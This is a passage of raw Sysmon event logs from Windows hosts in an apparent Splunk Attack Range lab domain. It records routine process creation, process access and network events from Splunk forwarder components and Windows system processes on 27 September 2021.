Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056917Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:33.203{5EBD8912-8DD1-6151-BB00-00000000FD01}5524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001056916Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:30.991{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54249-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000981458Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:34.613{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A3C98978CB78A5C78ABE2A3EA818754,SHA256=C0CDEEEE7C5638DB4AAD705C845ED0414098F8BE227F2578A1C11827F2EB3E76,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056945Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.921{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8DD2-6151-BD00-00000000FD01}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056944Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.921{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056943Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.921{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056942Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.921{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056941Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.921{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056940Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.921{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8DD2-6151-BD00-00000000FD01}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056939Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.921{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8DD2-6151-BD00-00000000FD01}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056938Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.922{5EBD8912-8DD2-6151-BD00-00000000FD01}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056937Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.718{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6F4860771794E82D21BA70BA7AAEE53,SHA256=33FE378CEC7E82BD32F041BE66309A32F54C48E4EAC8CEEC9D3F5E239DC44435,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056936Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.453{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EB547E2EDE8110F890711DC9FCE08563,SHA256=914CFFF1222F2A92796C34A5B55067960A0912EE027C00FAF80B50A0ED20F679,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056935Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.437{5EBD8912-8DD2-6151-BC00-00000000FD01}46445304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056934Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.249{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8DD2-6151-BC00-00000000FD01}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056933Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.249{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056932Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.249{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056931Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.249{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056930Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.249{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056929Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.249{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8DD2-6151-BC00-00000000FD01}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056928Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.249{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8DD2-6151-BC00-00000000FD01}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056927Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:34.250{5EBD8912-8DD2-6151-BC00-00000000FD01}4644C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000981462Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:35.957{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=61AEB29F36D9E37BCBF0845C8BF7BB83,SHA256=368B0FB25AD775C98F440D31C58A3AAB1124CD2BBC1A1DD4B9A30FCDF22A5DF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981461Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:35.957{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8A94B2371452B300C4092957750A4B6,SHA256=382316D682FBA06B95B43463722A7AC2B89633D413308BC8D7BE72F1DAA97F89,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981460Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:33.002{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54014-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981459Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:24:35.848{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECD4810B1E6BDDD52C37D84A9726D292,SHA256=86B5717D00C74FC986609A135D8F24C3C34056DE5A169C8CD89E7B22DF714F32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056947Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:35.718{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9897290D294256DFEDF1A2857031A232,SHA256=C05C499AD4F2F477AC9AF8E81FFFC8A66C6954BBE729FF623A1D5E8AB38183D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056946Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:35.249{5EBD8912-8DD2-6151-BD00-00000000FD01}49123468C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056957Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:36.734{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01B3366F3D882F5AE18922358D624E34,SHA256=2BEAB2BAA78FF01FEAF6CD7A35F63028A0F712CE6DD1A37A1D01C3FEEB5E7AC5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056956Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:36.593{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8DD4-6151-BE00-00000000FD01}5340C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056955Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:36.593{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056954Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:36.593{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056953Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:24:36.593{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\Syste